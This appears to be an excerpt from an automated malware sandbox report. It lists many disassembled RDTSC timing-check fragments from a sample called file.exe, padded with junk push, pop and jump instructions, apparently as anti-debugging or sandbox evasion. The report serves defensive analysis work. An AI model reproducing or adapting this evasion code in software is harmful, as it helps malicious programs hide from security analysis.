Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64894B second address: 6489C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 jmp 00007F91A0D1A3E4h 0x0000000c pop ebx 0x0000000d nop 0x0000000e mov di, 1D5Bh 0x00000012 mov ebx, dword ptr [ebp+12489977h] 0x00000018 cmc 0x00000019 add eax, ebx 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F91A0D1A3D8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov dh, C4h 0x00000037 mov di, B178h 0x0000003b nop 0x0000003c pushad 0x0000003d jc 00007F91A0D1A3D8h 0x00000043 pushad 0x00000044 popad 0x00000045 jno 00007F91A0D1A3D8h 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jng 00007F91A0D1A3E7h 0x00000055 jmp 00007F91A0D1A3E1h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6489C8 second address: 6489CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6976A5 second address: 6976A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69782A second address: 697853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E52FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F91A12E5300h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 697853 second address: 69789D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F91A0D1A3E7h 0x00000011 jo 00007F91A0D1A3EBh 0x00000017 jmp 00007F91A0D1A3E5h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F91A0D1A3DAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C1AD second address: 69C1CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C1CC second address: 69C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69B84C second address: 69B86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F91A12E5304h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69B9CC second address: 69B9E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BB2A second address: 69BB31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BB31 second address: 69BB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BB44 second address: 69BB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69BB48 second address: 69BB6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F91A0D1A3E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F91A0D1A3DCh 0x00000011 jp 00007F91A0D1A3D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69E7FD second address: 69E803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69E803 second address: 69E83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F91A0D1A3D6h 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007F91A0D1A3D6h 0x00000012 jmp 00007F91A0D1A3E3h 0x00000017 jmp 00007F91A0D1A3E1h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A502E second address: 6A5032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A55B1 second address: 6A55B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A55B5 second address: 6A55D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F91A12E5303h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A55D2 second address: 6A55EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F91A0D1A3DEh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 je 00007F91A0D1A3D6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A55EC second address: 6A55F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91A12E52F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5B6A second address: 6A5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5B6E second address: 6A5B8B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F91A12E52F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F91A12E52FDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A66B9 second address: 6A66CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0D1A3DDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A696C second address: 6A6974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6974 second address: 6A6978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6978 second address: 6A697E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A81A4 second address: 6A81AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC962 second address: 6AC96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC96C second address: 6AC983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F91A0D1A3DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC983 second address: 6AC9A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5307h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC9A7 second address: 6AC9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC9AC second address: 6AC9B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC9B1 second address: 6AC9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABCF8 second address: 6ABCFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABCFC second address: 6ABD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91A0D1A3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F91A0D1A3EAh 0x00000012 jmp 00007F91A0D1A3E4h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F91A0D1A3E7h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABD3D second address: 6ABD41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABEBD second address: 6ABECB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F91A0D1A3D6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABECB second address: 6ABED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABED1 second address: 6ABED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC574 second address: 6AC579 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC709 second address: 6AC729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AC729 second address: 6AC72D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1166 second address: 6B116A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B116A second address: 6B1170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1170 second address: 6B118B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007F91A0D1A3D6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F91A0D1A3D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B118B second address: 6B118F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B118F second address: 6B11B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F91A0D1A3E2h 0x0000000f jnp 00007F91A0D1A3D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7B15 second address: 6B7B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F91A12E52F6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91A12E52FAh 0x00000010 jnc 00007F91A12E52F6h 0x00000016 popad 0x00000017 push ebx 0x00000018 jns 00007F91A12E52F6h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pop ebx 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007F91A12E5301h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7B54 second address: 6B7B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F91A0D1A3E8h 0x0000000c jmp 00007F91A0D1A3DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7B6E second address: 6B7B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7FA3 second address: 6B7FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7FA7 second address: 6B7FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7FAD second address: 6B8001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E9h 0x00000007 push ebx 0x00000008 jg 00007F91A0D1A3D6h 0x0000000e jnl 00007F91A0D1A3D6h 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jng 00007F91A0D1A3D6h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F91A0D1A3E7h 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8138 second address: 6B813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B813C second address: 6B814C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F91A0D1A3D6h 0x00000008 jg 00007F91A0D1A3D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B83E7 second address: 6B840B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E5308h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B840B second address: 6B8424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3E1h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B85AD second address: 6B85BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B85BA second address: 6B85F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3E9h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F91A0D1A3DFh 0x00000011 pushad 0x00000012 jnc 00007F91A0D1A3D6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B85F6 second address: 6B85FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8743 second address: 6B8749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8749 second address: 6B874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B874E second address: 6B875E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F91A0D1A3E2h 0x00000008 jnl 00007F91A0D1A3D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8934 second address: 6B8938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B90E5 second address: 6B90EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B74FA second address: 6B74FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B74FE second address: 6B750B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F91A0D1A3D8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B750B second address: 6B7532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F91A12E52F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnc 00007F91A12E52FCh 0x00000014 je 00007F91A12E52F8h 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1622 second address: 6C1628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1628 second address: 6C162E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1338 second address: 6C133E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C133E second address: 6C134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E52FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D05AB second address: 6D05B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D05B1 second address: 6D05B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D013C second address: 6D0142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBBC second address: 6DEBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBC4 second address: 6DEBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBC9 second address: 6DEBCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEBCE second address: 6DEC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F91A0D1A3E3h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jmp 00007F91A0D1A3DBh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F91A0D1A3E1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DEC0A second address: 6DEC21 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F91A12E52FAh 0x00000008 pushad 0x00000009 jnc 00007F91A12E52F6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0467 second address: 6E0477 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2F5F second address: 6E2F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F91A12E52FEh 0x0000000b popad 0x0000000c je 00007F91A12E530Ch 0x00000012 push ecx 0x00000013 jnp 00007F91A12E52F6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2F82 second address: 6E2F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2DD6 second address: 6E2DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2DE1 second address: 6E2DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2DE5 second address: 6E2E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5306h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A12E5301h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E52C7 second address: 6E52CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED03B second address: 6ED04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E52FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED04A second address: 6ED056 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EBF7C second address: 6EBF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EBF86 second address: 6EBFCC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F91A0D1A3E4h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F91A0D1A3DCh 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f jmp 00007F91A0D1A3DDh 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pop esi 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EBFCC second address: 6EBFE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5301h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
